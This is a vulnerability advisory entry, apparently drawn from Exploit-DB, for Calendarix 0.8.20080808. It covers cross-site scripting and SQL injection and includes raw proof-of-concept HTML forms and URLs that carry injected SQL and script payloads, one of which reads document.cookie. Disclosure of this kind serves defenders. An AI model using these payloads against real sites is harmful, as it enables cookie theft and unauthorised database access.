Multiple Cross-Site Scripting and SQL Injection Vulnerabilities in Calendarix

vendor:

Calendarix

by:

Unknown

5.5

CVSS

MEDIUM

Cross-Site Scripting, SQL Injection

79, 89

CWE

Product Name: Calendarix

Affected Version From: 0.8.20080808

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Multiple Cross-Site Scripting and SQL Injection Vulnerabilities in Calendarix

The Calendarix application fails to sanitize user-supplied input, leading to multiple cross-site scripting vulnerabilities and an SQL injection vulnerability. By exploiting these vulnerabilities, an attacker can steal authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Implement proper input validation and sanitization techniques to prevent cross-site scripting and SQL injection attacks. Regularly update the Calendarix application to the latest version to address any security vulnerabilities.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47790/info


Calendarix is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Calendarix 0.8.20080808 is vulnerable; other versions may also be affected.


<form action="http://www.example.com/cal_login.php?op=login" method="post" name="main" />
<input type="hidden" name="login" value="&#039;SQL_CODE_HERE"/>
<input type="hidden" name="password" value=""/>
<input type="submit" value="submit"/>
</form>

http://www.example.com/cal_login.php/%27%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

<form action="http://www.example.com/cal_catview.php?catop=viewcat" method="post" name="main" />
<input type="hidden" name="gocat" value="&#039;</script><script>alert(document.cookie);</script>"/>
<input type="submit" value="submit"/>
</form>


http://www.example.com/cal_date.php?frmname=%3C/script%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

http://www.example.com/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28123%29;%3C/script%3E